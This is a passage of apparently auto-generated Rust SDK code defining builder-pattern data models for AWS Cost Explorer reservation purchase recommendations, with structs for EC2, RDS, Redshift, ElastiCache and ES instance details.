input: std::option::Option<std::string::String>,
) -> Self {
self.average_number_of_instances_used_per_hour = input;
self
}
/// <p>The average number of normalized units that you used in an hour during the historical
/// period. Amazon Web Services uses this to calculate your recommended reservation
/// purchases.</p>
pub fn average_normalized_units_used_per_hour(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.average_normalized_units_used_per_hour = Some(input.into());
self
}
pub fn set_average_normalized_units_used_per_hour(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.average_normalized_units_used_per_hour = input;
self
}
/// <p>The average utilization of your instances. Amazon Web Services uses this to calculate
/// your recommended reservation purchases.</p>
pub fn average_utilization(mut self, input: impl Into<std::string::String>) -> Self {
self.average_utilization = Some(input.into());
self
}
pub fn set_average_utilization(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.average_utilization = input;
self
}
/// <p>How long Amazon Web Services estimates that it takes for this instance to start saving
/// you money, in months.</p>
pub fn estimated_break_even_in_months(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.estimated_break_even_in_months = Some(input.into());
self
}
pub fn set_estimated_break_even_in_months(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.estimated_break_even_in_months = input;
self
}
/// <p>The currency code that Amazon Web Services used to calculate the costs for this
/// instance.</p>
pub fn currency_code(mut self, input: impl Into<std::string::String>) -> Self {
self.currency_code = Some(input.into());
self
}
pub fn set_currency_code(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.currency_code = input;
self
}
/// <p>How much Amazon Web Services estimates that this specific recommendation could save you
/// in a month.</p>
pub fn estimated_monthly_savings_amount(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.estimated_monthly_savings_amount = Some(input.into());
self
}
pub fn set_estimated_monthly_savings_amount(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.estimated_monthly_savings_amount = input;
self
}
/// <p>How much Amazon Web Services estimates that this specific recommendation could save you
/// in a month, as a percentage of your overall costs.</p>
pub fn estimated_monthly_savings_percentage(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.estimated_monthly_savings_percentage = Some(input.into());
self
}
pub fn set_estimated_monthly_savings_percentage(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.estimated_monthly_savings_percentage = input;
self
}
/// <p>How much Amazon Web Services estimates that you spend on On-Demand Instances in a
/// month.</p>
pub fn estimated_monthly_on_demand_cost(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.estimated_monthly_on_demand_cost = Some(input.into());
self
}
pub fn set_estimated_monthly_on_demand_cost(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.estimated_monthly_on_demand_cost = input;
self
}
/// <p>How much Amazon Web Services estimates that you would have spent for all usage during
/// the specified historical period if you had a reservation.</p>
pub fn estimated_reservation_cost_for_lookback_period(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.estimated_reservation_cost_for_lookback_period = Some(input.into());
self
}
pub fn set_estimated_reservation_cost_for_lookback_period(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.estimated_reservation_cost_for_lookback_period = input;
self
}
/// <p>How much purchasing this instance costs you upfront.</p>
pub fn upfront_cost(mut self, input: impl Into<std::string::String>) -> Self {
self.upfront_cost = Some(input.into());
self
}
pub fn set_upfront_cost(mut self, input: std::option::Option<std::string::String>) -> Self {
self.upfront_cost = input;
self
}
/// <p>How much purchasing this instance costs you on a monthly basis.</p>
pub fn recurring_standard_monthly_cost(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.recurring_standard_monthly_cost = Some(input.into());
self
}
pub fn set_recurring_standard_monthly_cost(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.recurring_standard_monthly_cost = input;
self
}
/// Consumes the builder and constructs a [`ReservationPurchaseRecommendationDetail`](crate::model::ReservationPurchaseRecommendationDetail)
pub fn build(self) -> crate::model::ReservationPurchaseRecommendationDetail {
crate::model::ReservationPurchaseRecommendationDetail {
account_id: self.account_id,
instance_details: self.instance_details,
recommended_number_of_instances_to_purchase: self
.recommended_number_of_instances_to_purchase,
recommended_normalized_units_to_purchase: self
.recommended_normalized_units_to_purchase,
minimum_number_of_instances_used_per_hour: self
.minimum_number_of_instances_used_per_hour,
minimum_normalized_units_used_per_hour: self.minimum_normalized_units_used_per_hour,
maximum_number_of_instances_used_per_hour: self
.maximum_number_of_instances_used_per_hour,
maximum_normalized_units_used_per_hour: self.maximum_normalized_units_used_per_hour,
average_number_of_instances_used_per_hour: self
.average_number_of_instances_used_per_hour,
average_normalized_units_used_per_hour: self.average_normalized_units_used_per_hour,
average_utilization: self.average_utilization,
estimated_break_even_in_months: self.estimated_break_even_in_months,
currency_code: self.currency_code,
estimated_monthly_savings_amount: self.estimated_monthly_savings_amount,
estimated_monthly_savings_percentage: self.estimated_monthly_savings_percentage,
estimated_monthly_on_demand_cost: self.estimated_monthly_on_demand_cost,
estimated_reservation_cost_for_lookback_period: self
.estimated_reservation_cost_for_lookback_period,
upfront_cost: self.upfront_cost,
recurring_standard_monthly_cost: self.recurring_standard_monthly_cost,
}
}
}
}
impl ReservationPurchaseRecommendationDetail {
/// Creates a new builder-style object to manufacture [`ReservationPurchaseRecommendationDetail`](crate::model::ReservationPurchaseRecommendationDetail)
pub fn builder() -> crate::model::reservation_purchase_recommendation_detail::Builder {
crate::model::reservation_purchase_recommendation_detail::Builder::default()
}
}
/// <p>Details about the instances that Amazon Web Services recommends that you
/// purchase.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct InstanceDetails {
/// <p>The Amazon EC2 instances that Amazon Web Services recommends that you purchase.</p>
pub ec2_instance_details: std::option::Option<crate::model::Ec2InstanceDetails>,
/// <p>The Amazon RDS instances that Amazon Web Services recommends that you purchase.</p>
pub rds_instance_details: std::option::Option<crate::model::RdsInstanceDetails>,
/// <p>The Amazon Redshift instances that Amazon Web Services recommends that you
/// purchase.</p>
pub redshift_instance_details: std::option::Option<crate::model::RedshiftInstanceDetails>,
/// <p>The ElastiCache instances that Amazon Web Services recommends that you purchase.</p>
pub elasti_cache_instance_details:
std::option::Option<crate::model::ElastiCacheInstanceDetails>,
/// <p>The Amazon ES instances that Amazon Web Services recommends that you purchase.</p>
pub es_instance_details: std::option::Option<crate::model::EsInstanceDetails>,
}
impl std::fmt::Debug for InstanceDetails {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("InstanceDetails");
formatter.field("ec2_instance_details", &self.ec2_instance_details);
formatter.field("rds_instance_details", &self.rds_instance_details);
formatter.field("redshift_instance_details", &self.redshift_instance_details);
formatter.field(
"elasti_cache_instance_details",
&self.elasti_cache_instance_details,
);
formatter.field("es_instance_details", &self.es_instance_details);
formatter.finish()
}
}
/// See [`InstanceDetails`](crate::model::InstanceDetails)
pub mod instance_details {
/// A builder for [`InstanceDetails`](crate::model::InstanceDetails)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) ec2_instance_details: std::option::Option<crate::model::Ec2InstanceDetails>,
pub(crate) rds_instance_details: std::option::Option<crate::model::RdsInstanceDetails>,
pub(crate) redshift_instance_details:
std::option::Option<crate::model::RedshiftInstanceDetails>,
pub(crate) elasti_cache_instance_details:
std::option::Option<crate::model::ElastiCacheInstanceDetails>,
pub(crate) es_instance_details: std::option::Option<crate::model::EsInstanceDetails>,
}
impl Builder {
/// <p>The Amazon EC2 instances that Amazon Web Services recommends that you purchase.</p>
pub fn ec2_instance_details(mut self, input: crate::model::Ec2InstanceDetails) -> Self {
self.ec2_instance_details = Some(input);
self
}
pub fn set_ec2_instance_details(
mut self,
input: std::option::Option<crate::model::Ec2InstanceDetails>,
) -> Self {
self.ec2_instance_details = input;
self
}
/// <p>The Amazon RDS instances that Amazon Web Services recommends that you purchase.</p>
pub fn rds_instance_details(mut self, input: crate::model::RdsInstanceDetails) -> Self {
self.rds_instance_details = Some(input);
self
}
pub fn set_rds_instance_details(
mut self,
input: std::option::Option<crate::model::RdsInstanceDetails>,
) -> Self {
self.rds_instance_details = input;
self
}
/// <p>The Amazon Redshift instances that Amazon Web Services recommends that you
/// purchase.</p>
pub fn redshift_instance_details(
mut self,
input: crate::model::RedshiftInstanceDetails,
) -> Self {
self.redshift_instance_details = Some(input);
self
}
pub fn set_redshift_instance_details(
mut self,
input: std::option::Option<crate::model::RedshiftInstanceDetails>,
) -> Self {
self.redshift_instance_details = input;
self
}
/// <p>The ElastiCache instances that Amazon Web Services recommends that you purchase.</p>
pub fn elasti_cache_instance_details(
mut self,
input: crate::model::ElastiCacheInstanceDetails,
) -> Self {
self.elasti_cache_instance_details = Some(input);
self
}
pub fn set_elasti_cache_instance_details(
mut self,
input: std::option::Option<crate::model::ElastiCacheInstanceDetails>,
) -> Self {
self.elasti_cache_instance_details = input;
self
}
/// <p>The Amazon ES instances that Amazon Web Services recommends that you purchase.</p>
pub fn es_instance_details(mut self, input: crate::model::EsInstanceDetails) -> Self {
self.es_instance_details = Some(input);
self
}
pub fn set_es_instance_details(
mut self,
input: std::option::Option<crate::model::EsInstanceDetails>,
) -> Self {
self.es_instance_details = input;
self
}
/// Consumes the builder and constructs a [`InstanceDetails`](crate::model::InstanceDetails)
pub fn build(self) -> crate::model::InstanceDetails {
crate::model::InstanceDetails {
ec2_instance_details: self.ec2_instance_details,
rds_instance_details: self.rds_instance_details,
redshift_instance_details: self.redshift_instance_details,
elasti_cache_instance_details: self.elasti_cache_instance_details,
es_instance_details: self.es_instance_details,
}
}
}
}
impl InstanceDetails {
/// Creates a new builder-style object to manufacture [`InstanceDetails`](crate::model::InstanceDetails)
pub fn builder() -> crate::model::instance_details::Builder {
crate::model::instance_details::Builder::default()
}
}
/// <p>Details about the Amazon ES instances that Amazon Web Services recommends that you
/// purchase.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct EsInstanceDetails {
/// <p>The class of instance that Amazon Web Services recommends.</p>
pub instance_class: std::option::Option<std::string::String>,
/// <p>The size of instance that Amazon Web Services recommends.</p>
pub instance_size: std::option::Option<std::string::String>,
/// <p>The Amazon Web Services Region of the recommended reservation.</p>
pub region: std::option::Option<std::string::String>,
/// <p>Determines whether the recommendation is for a current-generation instance.</p>
pub current_generation: bool,
/// <p>Determines whether the recommended reservation is size flexible.</p>
pub size_flex_eligible: bool,
}
impl std::fmt::Debug for EsInstanceDetails {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("EsInstanceDetails");
formatter.field("instance_class", &self.instance_class);
formatter.field("instance_size", &self.instance_size);
formatter.field("region", &self.region);
formatter.field("current_generation", &self.current_generation);
formatter.field("size_flex_eligible", &self.size_flex_eligible);
formatter.finish()
}
}
/// See [`EsInstanceDetails`](crate::model::EsInstanceDetails)
pub mod es_instance_details {
/// A builder for [`EsInstanceDetails`](crate::model::EsInstanceDetails)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) instance_class: std::option::Option<std::string::String>,
pub(crate) instance_size: std::option::Option<std::string::String>,
pub(crate) region: std::option::Option<std::string::String>,
pub(crate) current_generation: std::option::Option<bool>,
pub(crate) size_flex_eligible: std::option::Option<bool>,
}
impl Builder {
/// <p>The class of instance that Amazon Web Services recommends.</p>
pub fn instance_class(mut self, input: impl Into<std::string::String>) -> Self {
self.instance_class = Some(input.into());
self
}
pub fn set_instance_class(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.instance_class = input;
self
}
/// <p>The size of instance that Amazon Web Services recommends.</p>
pub fn instance_size(mut self, input: impl Into<std::string::String>) -> Self {
self.instance_size = Some(input.into());
self
}
pub fn set_instance_size(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.instance_size = input;
self
}
/// <p>The Amazon Web Services Region of the recommended reservation.</p>
pub fn region(mut self, input: impl Into<std::string::String>) -> Self {
self.region = Some(input.into());
self
}
pub fn set_region(mut self, input: std::option::Option<std::string::String>) -> Self {
self.region = input;
self
}
/// <p>Determines whether the recommendation is for a current-generation instance.</p>
pub fn current_generation(mut self, input: bool) -> Self {
self.current_generation = Some(input);
self
}
pub fn set_current_generation(mut self, input: std::option::Option<bool>) -> Self {
self.current_generation = input;
self
}
/// <p>Determines whether the recommended reservation is size flexible.</p>
pub fn size_flex_eligible(mut self, input: bool) -> Self {
self.size_flex_eligible = Some(input);
self
}
pub fn set_size_flex_eligible(mut self, input: std::option::Option<bool>) -> Self {
self.size_flex_eligible = input;
self
}
/// Consumes the builder and constructs a [`EsInstanceDetails`](crate::model::EsInstanceDetails)
pub fn build(self) -> crate::model::EsInstanceDetails {
crate::model::EsInstanceDetails {
instance_class: self.instance_class,
instance_size: self.instance_size,
region: self.region,
current_generation: self.current_generation.unwrap_or_default(),
size_flex_eligible: self.size_flex_eligible.unwrap_or_default(),
}
}
}
}
impl EsInstanceDetails {
/// Creates a new builder-style object to manufacture [`EsInstanceDetails`](crate::model::EsInstanceDetails)
pub fn builder() -> crate::model::es_instance_details::Builder {
crate::model::es_instance_details::Builder::default()
}
}
/// <p>Details about the Amazon ElastiCache instances that Amazon Web Services recommends that
/// you purchase.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct ElastiCacheInstanceDetails {
/// <p>The instance family of the recommended reservation.</p>
pub family: std::option::Option<std::string::String>,
/// <p>The type of node that Amazon Web Services recommends.</p>
pub node_type: std::option::Option<std::string::String>,
/// <p>The Amazon Web Services Region of the recommended reservation.</p>
pub region: std::option::Option<std::string::String>,
/// <p>The description of the recommended reservation.</p>
pub product_description: std::option::Option<std::string::String>,
/// <p>Determines whether the recommendation is for a current generation instance.</p>
pub current_generation: bool,
/// <p>Determines whether the recommended reservation is size flexible.</p>
pub size_flex_eligible: bool,
}
impl std::fmt::Debug for ElastiCacheInstanceDetails {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("ElastiCacheInstanceDetails");
formatter.field("family", &self.family);
formatter.field("node_type", &self.node_type);
formatter.field("region", &self.region);
formatter.field("product_description", &self.product_description);
formatter.field("current_generation", &self.current_generation);
formatter.field("size_flex_eligible", &self.size_flex_eligible);
formatter.finish()
}
}
/// See [`ElastiCacheInstanceDetails`](crate::model::ElastiCacheInstanceDetails)
pub mod elasti_cache_instance_details {
/// A builder for [`ElastiCacheInstanceDetails`](crate::model::ElastiCacheInstanceDetails)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) family: std::option::Option<std::string::String>,
pub(crate) node_type: std::option::Option<std::string::String>,
pub(crate) region: std::option::Option<std::string::String>,
pub(crate) product_description: std::option::Option<std::string::String>,
pub(crate) current_generation: std::option::Option<bool>,
pub(crate) size_flex_eligible: std::option::Option<bool>,
}
impl Builder {
/// <p>The instance family of the recommended reservation.</p>
pub fn family(mut self, input: impl Into<std::string::String>) -> Self {
self.family = Some(input.into());
self
}
pub fn set_family(mut self, input: std::option::Option<std::string::String>) -> Self {
self.family = input;
self
}
/// <p>The type of node that Amazon Web Services recommends.</p>
pub fn node_type(mut self, input: impl Into<std::string::String>) -> Self {
self.node_type = Some(input.into());
self
}
pub fn set_node_type(mut self, input: std::option::Option<std::string::String>) -> Self {
self.node_type = input;
self
}
/// <p>The Amazon Web Services Region of the recommended reservation.</p>
pub fn region(mut self, input: impl Into<std::string::String>) -> Self {
self.region = Some(input.into());
self
}
pub fn set_region(mut self, input: std::option::Option<std::string::String>) -> Self {
self.region = input;
self
}
/// <p>The description of the recommended reservation.</p>
pub fn product_description(mut self, input: impl Into<std::string::String>) -> Self {
self.product_description = Some(input.into());
self
}
pub fn set_product_description(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.product_description = input;
self
}
/// <p>Determines whether the recommendation is for a current generation instance.</p>
pub fn current_generation(mut self, input: bool) -> Self {
self.current_generation = Some(input);
self
}
pub fn set_current_generation(mut self, input: std::option::Option<bool>) -> Self {
self.current_generation = input;
self
}
/// <p>Determines whether the recommended reservation is size flexible.</p>
pub fn size_flex_eligible(mut self, input: bool) -> Self {
self.size_flex_eligible = Some(input);
self
}
pub fn set_size_flex_eligible(mut self, input: std::option::Option<bool>) -> Self {
self.size_flex_eligible = input;
self
}
/// Consumes the builder and constructs a [`ElastiCacheInstanceDetails`](crate::model::ElastiCacheInstanceDetails)
pub fn build(self) -> crate::model::ElastiCacheInstanceDetails {
crate::model::ElastiCacheInstanceDetails {
family: self.family,
node_type: self.node_type,
region: self.region,
product_description: self.product_description,
current_generation: self.current_generation.unwrap_or_default(),
size_flex_eligible: self.size_flex_eligible.unwrap_or_default(),
}
}
}
}
impl ElastiCacheInstanceDetails {
/// Creates a new builder-style object to manufacture [`ElastiCacheInstanceDetails`](crate::model::ElastiCacheInstanceDetails)
pub fn builder() -> crate::model::elasti_cache_instance_details::Builder {
crate::model::elasti_cache_instance_details::Builder::default()
}
}
/// <p>Details about the Amazon Redshift instances that Amazon Web Services recommends that
/// you purchase.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct RedshiftInstanceDetails {
/// <p>The instance family of the recommended reservation.</p>
pub family: std::option::Option<std::string::String>,
/// <p>The type of node that Amazon Web Services recommends.</p>
pub node_type: std::option::Option<std::string::String>,
/// <p>The Amazon Web Services Region of the recommended reservation.</p>
pub region: std::option::Option<std::string::String>,
/// <p>Determines whether the recommendation is for a current-generation instance.</p>
pub current_generation: bool,
/// <p>Determines whether the recommended reservation is size flexible.</p>
pub size_flex_eligible: bool,
}
impl std::fmt::Debug for RedshiftInstanceDetails {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("RedshiftInstanceDetails");
formatter.field("family", &self.family);
formatter.field("node_type", &self.node_type);
formatter.field("region", &self.region);
formatter.field("current_generation", &self.current_generation);
formatter.field("size_flex_eligible", &self.size_flex_eligible);
formatter.finish()
}
}
/// See [`RedshiftInstanceDetails`](crate::model::RedshiftInstanceDetails)
pub mod redshift_instance_details {
/// A builder for [`RedshiftInstanceDetails`](crate::model::RedshiftInstanceDetails)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) family: std::option::Option<std::string::String>,
pub(crate) node_type: std::option::Option<std::string::String>,
pub(crate) region: std::option::Option<std::string::String>,
pub(crate) current_generation: std::option::Option<bool>,
pub(crate) size_flex_eligible: std::option::Option<bool>,
}
impl Builder {
/// <p>The instance family of the recommended reservation.</p>
pub fn family(mut self, input: impl Into<std::string::String>) -> Self {
self.family = Some(input.into());
self
}
pub fn set_family(mut self, input: std::option::Option<std::string::String>) -> Self {
self.family = input;
self
}
/// <p>The type of node that Amazon Web Services recommends.</p>
pub fn node_type(mut self, input: impl Into<std::string::String>) -> Self {
self.node_type = Some(input.into());
self
}
pub fn set_node_type(mut self, input: std::option::Option<std::string::String>) -> Self {
self.node_type = input;
self
}
/// <p>The Amazon Web Services Region of the recommended reservation.</p>
pub fn region(mut self, input: impl Into<std::string::String>) -> Self {
self.region = Some(input.into());
self
}
pub fn set_region(mut self, input: std::option::Option<std::string::String>) -> Self {
self.region = input;
self
}
/// <p>Determines whether the recommendation is for a current-generation instance.</p>
pub fn current_generation(mut self, input: bool) -> Self {
self.current_generation = Some(input);
self
}
pub fn set_current_generation(mut self, input: std::option::Option<bool>) -> Self {
self.current_generation = input;
self
}
/// <p>Determines whether the recommended reservation is size flexible.</p>
pub fn size_flex_eligible(mut self, input: bool) -> Self {
self.size_flex_eligible = Some(input);
self
}
pub fn set_size_flex_eligible(mut self, input: std::option::Option<bool>) -> Self {
self.size_flex_eligible = input;
self
}
/// Consumes the builder and constructs a [`RedshiftInstanceDetails`](crate::model::RedshiftInstanceDetails)
pub fn build(self) -> crate::model::RedshiftInstanceDetails {
crate::model::RedshiftInstanceDetails {
family: self.family,
node_type: self.node_type,
region: self.region,
current_generation: self.current_generation.unwrap_or_default(),
size_flex_eligible: self.size_flex_eligible.unwrap_or_default(),
}
}
}
}
impl RedshiftInstanceDetails {
/// Creates a new builder-style object to manufacture [`RedshiftInstanceDetails`](crate::model::RedshiftInstanceDetails)
pub fn builder() -> crate::model::redshift_instance_details::Builder {
crate::model::redshift_instance_details::Builder::default()
}
}
/// <p>Details about the Amazon RDS instances that Amazon Web Services recommends that you
/// purchase.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct RdsInstanceDetails {
/// <p>The instance family of the recommended reservation.</p>
pub family: std::option::Option<std::string::String>,
/// <p>The type of instance that Amazon Web Services recommends.</p>
pub instance_type: std::option::Option<std::string::String>,
/// <p>The Amazon Web Services Region of the recommended reservation.</p>
pub region: std::option::Option<std::string::String>,
/// <p>The database engine that the recommended reservation supports.</p>
pub database_engine: std::option::Option<std::string::String>,
/// <p>The database edition that the recommended reservation supports.</p>
pub database_edition: std::option::Option<std::string::String>,
/// <p>Determines whether the recommendation is for a reservation in a single Availability
/// Zone or a reservation with a backup in a second Availability Zone.</p>
pub deployment_option: std::option::Option<std::string::String>,
/// <p>The license model that the recommended reservation supports.</p>
pub license_model: std::option::Option<std::string::String>,
/// <p>Determines whether the recommendation is for a current-generation instance. </p>
pub current_generation: bool,
/// <p>Determines whether the recommended reservation is size flexible.</p>
pub size_flex_eligible: bool,
}
impl std::fmt::Debug for RdsInstanceDetails {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("RdsInstanceDetails");
formatter.field("family", &self.family);
formatter.field("instance_type", &self.instance_type);
formatter.field("region", &self.region);
formatter.field("database_engine", &self.database_engine);
formatter.field("database_edition", &self.database_edition);
formatter.field("deployment_option", &self.deployment_option);
formatter.field("license_model", &self.license_model);
formatter.field("current_generation", &self.current_generation);
formatter.field("size_flex_eligible", &self.size_flex_eligible);
formatter.finish()
}
}
/// See [`RdsInstanceDetails`](crate::model::RdsInstanceDetails)
pub mod rds_instance_details {
/// A builder for [`RdsInstanceDetails`](crate::model::RdsInstanceDetails)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) family: std::option::Option<std::string::String>,
pub(crate) instance_type: std::option::Option<std::string::String>,
pub(crate) region: std::option::Option<std::string::String>,
pub(crate) database_engine: std::option::Option<std::string::String>,
pub(crate) database_edition: std::option::Option<std::string::String>,
pub(crate) deployment_option: std::option::Option<std::string::String>,
pub(crate) license_model: std::option::Option<std::string::String>,
pub(crate) current_generation: std::option::Option<bool>,
pub(crate) size_flex_eligible: std::option::Option<bool>,
}
impl Builder {
/// <p>The instance family of the recommended reservation.</p>
pub fn family(mut self, input: impl Into<std::string::String>) -> Self {
self.family = Some(input.into());
self
}
pub fn set_family(mut self, input: std::option::Option<std::string::String>) -> Self {
self.family = input;
self
}
/// <p>The type of instance that Amazon Web Services recommends.</p>
pub fn instance_type(mut self, input: impl Into<std::string::String>) -> Self {
self.instance_type = Some(input.into());
self
}
pub fn set_instance_type(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.instance_type = input;
self
}
/// <p>The Amazon Web Services Region of the recommended reservation.</p>
pub fn region(mut self, input: impl Into<std::string::String>) -> Self {
self.region = Some(input.into());
self
}
pub fn set_region(mut self, input: std::option::Option<std::string::String>) -> Self {
self.region = input;
self
}
/// <p>The database engine that the recommended reservation supports.</p>
pub fn database_engine(mut self, input: impl Into<std::string::String>) -> Self {
self.database_engine = Some(input.into());
self
}
pub fn set_database_engine(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.database_engine = input;
self
}
/// <p>The database edition that the recommended reservation supports.</p>
pub fn database_edition(mut self, input: impl Into<std::string::String>) -> Self {
self.database_edition = Some(input.into());
self
}
pub fn set_database_edition(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.database_edition = input;
self
}
/// <p>Determines whether the recommendation is for a reservation in a single Availability
/// Zone or a reservation with a backup in a second Availability Zone.</p>
pub fn deployment_option(mut self, input: impl Into<std::string::String>) -> Self {
self.deployment_option = Some(input.into());
self
}
pub fn set_deployment_option(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.deployment_option = input;
self
}
/// <p>The license model that the recommended reservation supports.</p>
pub fn license_model(mut self, input: impl Into<std::string::String>) -> Self {
self.license_model = Some(input.into());
self
}
pub fn set_license_model(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.license_model = input;
self
}
/// <p>Determines whether the recommendation is for a current-generation instance. </p>
pub fn current_generation(mut self, input: bool) -> Self {
self.current_generation = Some(input);
self
}
pub fn set_current_generation(mut self, input: std::option::Option<bool>) -> Self {
self.current_generation = input;
self
}
/// <p>Determines whether the recommended reservation is size flexible.</p>
pub fn size_flex_eligible(mut self, input: bool) -> Self {
self.size_flex_eligible = Some(input);
self
}
pub fn set_size_flex_eligible(mut self, input: std::option::Option<bool>) -> Self {
self.size_flex_eligible = input;
self
}
/// Consumes the builder and constructs a [`RdsInstanceDetails`](crate::model::RdsInstanceDetails)
pub fn build(self) -> crate::model::RdsInstanceDetails {
crate::model::RdsInstanceDetails {
family: self.family,
instance_type: self.instance_type,
region: self.region,
database_engine: self.database_engine,
database_edition: self.database_edition,
deployment_option: self.deployment_option,
license_model: self.license_model,
current_generation: self.current_generation.unwrap_or_default(),
size_flex_eligible: self.size_flex_eligible.unwrap_or_default(),
}
}
}
}
impl RdsInstanceDetails {
/// Creates a new builder-style object to manufacture [`RdsInstanceDetails`](crate::model::RdsInstanceDetails)
pub fn builder() -> crate::model::rds_instance_details::Builder {
crate::model::rds_instance_details::Builder::default()
}
}
/// <p>Details about the Amazon EC2 instances that Amazon Web Services recommends that you
/// purchase.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct Ec2InstanceDetails {
/// <p>The instance family of the recommended reservation.</p>
pub family: std::option::Option<std::string::String>,
/// <p>The type of instance that Amazon Web Services recommends.</p>
pub instance_type: std::option::Option<std::string::String>,
/// <p>The Amazon Web Services Region of the recommended reservation.</p>
pub region: std::option::Option<std::string::String>,
/// <p>The Availability Zone of the recommended reservation.</p>
pub availability_zone: std::option::Option<std::string::String>,
/// <p>The platform of the recommended reservation. The platform is the specific combination
/// of operating system, license model, and software on an instance.</p>
pub platform: std::option::Option<std::string::String>,
/// <p>Determines whether the recommended reservation is dedicated or shared.</p>
pub tenancy: std::option::Option<std::string::String>,
/// <p>Determines whether the recommendation is for a current-generation instance. </p>
pub current_generation: bool,
/// <p>Determines whether the recommended reservation is size flexible.</p>
pub size_flex_eligible: bool,
}
impl std::fmt::Debug for Ec2InstanceDetails {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("Ec2InstanceDetails");
formatter.field("family", &self.family);
formatter.field("instance_type", &self.instance_type);
formatter.field("region", &self.region);
formatter.field("availability_zone", &self.availability_zone);
formatter.field("platform", &self.platform);
formatter.field("tenancy", &self.tenancy);
formatter.field("current_generation", &self.current_generation);
formatter.field("size_flex_eligible", &self.size_flex_eligible);
formatter.finish()
}
}
/// See [`Ec2InstanceDetails`](crate::model::Ec2InstanceDetails)
pub mod ec2_instance_details {
/// A builder for [`Ec2InstanceDetails`](crate::model::Ec2InstanceDetails)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) family: std::option::Option<std::string::String>,
pub(crate) instance_type: std::option::Option<std::string::String>,
pub(crate) region: std::option::Option<std::string::String>,
pub(crate) availability_zone: std::option::Option<std::string::String>,
pub(crate) platform: std::option::Option<std::string::String>,
pub(crate) tenancy: std::option::Option<std::string::String>,
pub(crate) current_generation: std::option::Option<bool>,
pub(crate) size_flex_eligible: std::option::Option<bool>,
}
impl Builder {
/// <p>The instance family of the recommended reservation.</p>
pub fn family(mut self, input: impl Into<std::string::String>) -> Self {
self.family = Some(input.into());
self
}
pub fn set_family(mut self, input: std::option::Option<std::string::String>) -> Self {
self.family = input;
self
}
/// <p>The type of instance that Amazon Web Services recommends.</p>
pub fn instance_type(mut self, input: impl Into<std::string::String>) -> Self {
self.instance_type = Some(input.into());
self
}
pub fn set_instance_type(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.instance_type = input;
self
}
/// <p>The Amazon Web Services Region of the recommended reservation.</p>
pub fn region(mut self, input: impl Into<std::string::String>) -> Self {
self.region = Some(input.into());
self
}
pub fn set_region(mut self, input: std::option::Option<std::string::String>) -> Self {
self.region = input;
self
}
/// <p>The Availability Zone of the recommended reservation.</p>
pub fn availability_zone(mut self, input: impl Into<std::string::String>) -> Self {
self.availability_zone = Some(input.into());
self
}
pub fn set_availability_zone(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.availability_zone = input;
self
}
/// <p>The platform of the recommended reservation. The platform is the specific combination
/// of operating system, license model, and software on an instance.</p>
pub fn platform(mut self, input: impl Into<std::string::String>) -> Self {
self.platform = Some(input.into());
self
}
pub fn set_platform(mut self, input: std::option::Option<std::string::String>) -> Self {
self.platform = input;
self
}
/// <p>Determines whether the recommended reservation is dedicated or shared.</p>
pub fn tenancy(mut self, input: impl Into<std::string::String>) -> Self {
self.tenancy = Some(input.into());
self
}
pub fn set_tenancy(mut self, input: std::option::Option<std::string::String>) -> Self {
self.tenancy = input;
self
}
